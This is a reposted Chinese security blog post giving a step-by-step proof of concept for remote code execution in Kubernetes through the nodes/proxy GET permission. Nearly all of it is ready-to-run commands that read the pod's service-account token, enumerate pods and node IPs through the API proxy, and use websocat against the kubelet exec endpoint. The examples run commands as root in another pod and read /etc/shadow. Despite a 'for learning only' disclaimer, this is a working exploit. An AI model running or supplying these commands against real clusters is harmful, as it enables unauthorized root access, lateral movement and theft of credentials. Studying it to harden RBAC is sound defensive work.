2026-01-31 23:42:38 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文演示了利用Kubernetes的nodes/proxyGET权限实现远程代码执行RCE的攻击手法。攻击者通过解析JWT获取节点名，利用API代理发现目标，并借助WebSocket握手时的GET请求绕过create限制，直接向Kubelet发送指令在任意Pod中执行命令。该POC揭示了看似只读的权限配置不当可导致横向移动风险，建议严格限制节点代理访问权限。 综合评分： 85 文章分类： 漏洞POC,云安全,渗透测试

cover_image

Kubernetes RCE：利用 nodes/proxy GET 请求漏洞

ZM ZM

暗镜

2026年1月31日 12:00 北京

这是一个POC验证Kubernetes RCE仅供学习，不得用于其他用途

本实验演示了nodes/proxy GET权限如何允许在任何 Pod 中执行命令，即使该 Pod 看起来是只读的。

进入目标POD

首先，进入目标 pod。该 pod 有一个仅具有相应nodes/proxy GET权限的服务帐户。

kubectl&nbsp;exec&nbsp;-it&nbsp;attacker&nbsp;--&nbsp;sh

复制到剪贴板

检查您的权限

确认服务帐户仅包含nodes/proxy GET：

kubectl&nbsp;auth&nbsp;can-i&nbsp;--list

复制到剪贴板

你应该nodes/proxy只看到get动词部分——无需create许可。

设置环境变量

在攻击者 pod 内部，设置令牌和 API 服务器：

export&nbsp;TOKEN=$(cat&nbsp;/var/run/secrets/kubernetes.io/serviceaccount/token)
export&nbsp;APISERVER=https://kubernetes.default.svc

复制到剪贴板

从 JWT 令牌有效负载中提取节点名称（JWT 使用 base64url 编码）：

export&nbsp;NODE_NAME=$(echo&nbsp;"$(echo&nbsp;$TOKEN&nbsp;|&nbsp;cut&nbsp;-d. -f2)=="&nbsp;|&nbsp;tr&nbsp;'_-'&nbsp;'/+'&nbsp;|&nbsp;base64&nbsp;-d&nbsp;2>/dev/null&nbsp;|&nbsp;jq&nbsp;-r&nbsp;'.["kubernetes.io"].node.name')
echo&nbsp;$NODE_NAME

复制到剪贴板

发现 Pod 和节点 IP

仅使用nodes/proxy GET，查询 API 服务器代理端点，列出节点上的所有 pod 并发现它们的主机 IP：

wget&nbsp;-qO-&nbsp;--no-check-certificate&nbsp;\
&nbsp; --header&nbsp;"Authorization: Bearer&nbsp;$TOKEN"&nbsp;\
&nbsp; "$APISERVER/api/v1/nodes/$NODE_NAME/proxy/pods"&nbsp;|&nbsp;jq&nbsp;-r&nbsp;'.items[] | "Node: \(.spec.nodeName) (\(.status.hostIP)), Namespace: \(.metadata.namespace), Pod: \(.metadata.name)"'

复制到剪贴板

提取节点 IP 地址以备后用：

export&nbsp;NODE_IP=$(wget&nbsp;-qO-&nbsp;--no-check-certificate&nbsp;\
&nbsp; --header&nbsp;"Authorization: Bearer&nbsp;$TOKEN"&nbsp;\
&nbsp; "$APISERVER/api/v1/nodes/$NODE_NAME/proxy/pods"&nbsp;|&nbsp;jq&nbsp;-r&nbsp;'.items[0].status.hostIP')

echo&nbsp;$NODE_IP

复制到剪贴板

在任何 Pod 中执行命令

现在可以使用 websocat 在 nginx pod 中执行命令。之所以可行，是因为 WebSocket 连接使用 HTTP GET 进行握手，从而绕过了 CREATE 谓词检查：

websocat&nbsp;--insecure&nbsp;\
&nbsp; --header&nbsp;"Authorization: Bearer&nbsp;$TOKEN"&nbsp;\
&nbsp; --protocol&nbsp;v4.channel.k8s.io&nbsp;\
&nbsp; "wss://$NODE_IP:10250/exec/default/nginx/nginx?output=1&error=1&command=id"

复制到剪贴板

你应该看到类似这样的输出uid=0(root) gid=0(root) groups=0(root)——证明仅使用 GET 权限执行命令。

websocat&nbsp;--insecure&nbsp;\
&nbsp; --header&nbsp;"Authorization: Bearer&nbsp;$TOKEN"&nbsp;\
&nbsp; --protocol&nbsp;v4.channel.k8s.io&nbsp;\
&nbsp; "wss://$NODE_IP:10250/exec/default/nginx/nginx?output=1&error=1&command=cat&command=/etc/shadow"

复制到剪贴板

/etc/shadow读取nginx主机上的内容。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：暗镜 ZM ZM《Kubernetes RCE：利用 nodes/proxy GET 请求漏洞》